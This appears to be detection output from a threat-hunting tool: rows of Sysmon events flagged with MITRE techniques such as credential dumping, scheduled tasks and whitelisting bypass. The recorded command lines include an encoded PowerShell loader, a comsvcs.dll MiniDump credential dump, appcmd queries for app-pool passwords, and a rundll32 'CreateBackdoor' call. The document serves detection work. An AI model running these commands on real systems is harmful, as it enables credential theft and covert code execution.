SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88 + 747F3D96-08DA-5E76-0000-001054382E00 + 2632 + C:\Windows\System32\cmd.exe + "C:\Windows\system32\cmd.exe" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task manipulation ,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Medium,"Found User (NT AUTHORITY\SYSTEM) Trying to run taskeng.exe or svchost.exe with Command Line (C:\Windows\system32\svchost.exe) and Parent Image :C:\Users\IEUser\Desktop\info.rar\jjs.exe , Parent CommandLine ("C:\Users\IEUser\Desktop\info.rar\jjs.exe") in directory : ( C:\Windows\system32\ )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-26 04:01:43.557 + 365ABB72-0FA7-5CEA-0000-001064C60A00 + 3908 + C:\Windows\System32\svchost.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\svchost.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8DBD-5CEA-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE + 365ABB72-0FA6-5CEA-0000-0010FEC30A00 + 3884 + C:\Users\IEUser\Desktop\info.rar\jjs.exe + "C:\Users\IEUser\Desktop\info.rar\jjs.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1053] Scheduled Task - Process,1558843303.567204,2019-05-26T08:01:43.567204+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4863 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-26 04:01:43.557 + 365ABB72-0FA7-5CEA-0000-001064C60A00 + 3908 + C:\Windows\System32\svchost.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Host Process for Windows Services + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\svchost.exe + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 365ABB72-8DBD-5CEA-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE + 365ABB72-0FA6-5CEA-0000-0010FEC30A00 + 3884 + C:\Users\IEUser\Desktop\info.rar\jjs.exe + "C:\Users\IEUser\Desktop\info.rar\jjs.exe" + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 26 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.418 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\samlib.dll + 6.1.7601.23677 (win7sp1_ldr.170209-0600) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.659248,2019-04-18T21:01:34.659248+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 26 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.418 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\samlib.dll + 6.1.7601.23677 (win7sp1_ldr.170209-0600) + SAM Library DLL + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243550 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.388 + 747F3D96-9F69-5E75-0000-001055912000 + 8160 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.350815,2019-05-27T05:29:17.350815+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5889 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.310 + 365ABB72-3D6D-5CEB-0000-00109767FF00 + 3096 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool /text:processmodel.username + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243550 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.388 + 747F3D96-9F69-5E75-0000-001055912000 + 8160 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1584827104.923222,2020-03-22T01:45:04.923222+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\windows\system32\cmd.exe" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 244866 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 21:45:04.909 + 747F3D96-8AE0-5E76-0000-0010933B8003 + 7708 + C:\Windows\System32\cmd.exe + 10.0.17763.592 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + Cmd.Exe + "C:\windows\system32\cmd.exe" + c:\Users\Public\ + MSEDGEWIN10\IEUser + 747F3D96-06A4-5E76-0000-002087DE0200 + 0x2de87 + 1 + Medium + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-06AA-5E76-0000-001046E10400 + 4668 + C:\Windows\explorer.exe + C:\Windows\Explorer.EXE + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +Prohibited Process connecting to internet,1557770610.556085,2019-05-13T22:03:30.556085+04:00,,Threat,Critical,"User (IEWIN7\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.128.133 ) and port ( 443 )",3," + + + + + 3 + 5 + 4 + 3 + 0 + 0x8000000000000000 + + + 17289 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-13 18:03:20.485 + 365ABB72-B167-5CD9-0000-001062160C00 + 2476 + C:\Windows\System32\regsvr32.exe + IEWIN7\IEUser + tcp + true + false + 10.0.2.15 + IEWIN7 + 49159 + + false + 151.101.128.133 + + 443 + https + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766825.401237,2020-03-21T09:00:25.401237+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243550 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:25.388 + 747F3D96-9F69-5E75-0000-001055912000 + 8160 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[ T1003 ] Credential Dumping ImageLoad,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 25 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.138 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\cryptdll.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Cryptography Manager + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606894.448945,2019-04-18T21:01:34.448945+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7," + + + + + 7 + 3 + 4 + 7 + 0 + 0x8000000000000000 + + + 25 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + technique_id=T1003,technique_name=Credential Dumping + 2019-04-18 17:01:34.138 + 365ABB72-AC28-5CB8-0000-0010F3F70700 + 1200 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + C:\Windows\System32\cryptdll.dll + 6.1.7600.16385 (win7_rtm.090713-1255) + Cryptography Manager + Microsoft® Windows® Operating System + Microsoft Corporation + SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2 + true + Microsoft Windows + Valid + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920557.2707,2019-05-27T05:29:17.270700+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5886 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:17.230 + 365ABB72-3D6D-5CEB-0000-0010D763FF00 + 3240 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list apppool "ERROR ( message:Configuration error " /text:processmodel.password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-08-30 12:54:08.331 + 747F3D96-1C70-5D69-0000-0010C9661F00 + 2888 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-1B6A-5D69-0000-0020E5810E00 + 0xe81e5 + 1 + High + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-1C70-5D69-0000-0010D4551F00 + 1144 + C:\Windows\System32\wbem\WmiPrvSE.exe + C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1567169648.396724,2019-08-30T16:54:08.396724+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 C:\windows\system32\comsvcs.dll, MiniDump 4868 C:\Windows\System32\notepad.bin full )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 32154 + + + + + 